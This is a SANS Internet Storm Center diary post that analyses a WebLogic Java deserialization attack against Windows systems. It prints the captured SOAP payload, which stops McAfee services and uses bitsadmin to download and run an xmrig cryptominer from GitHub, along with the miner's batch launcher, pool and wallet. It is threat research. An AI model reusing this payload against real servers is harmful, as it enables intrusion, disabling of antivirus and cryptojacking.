Java Deserialization Attack Against Windows - SANS Internet Storm Center

Participate: Learn more about our honeypot network
https://isc.sans.edu/tools/honeypot/

Handler on Duty: Didier Stevens

Threat Level: green

Java Deserialization Attack Against Windows
Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3" > <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>net stop "McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe;dir xmrig;xmrig.bat;tasklist;</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> The actual payload: Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?) net stop "McAfee McShield; net stop mcafeeframework; Use bitsadmin to download the cryptominer and a batch file to start it from GitHub bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat"; bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe; dir xmrig; xmrig.bat; tasklist; The Batch file: taskkill /im /f xmrig.exe /t net stop "McAfee McShield" net stop mcafeeframework xmrig.exe -o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1 First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the monerohash.com pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection. So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) . --- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute Twitter\| I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANS San Francisco Winter 2022	Johannes 4601 Posts ISC Handler Apr 3rd 2018
Thread locked Subscribe	Apr 3rd 2018 4 years ago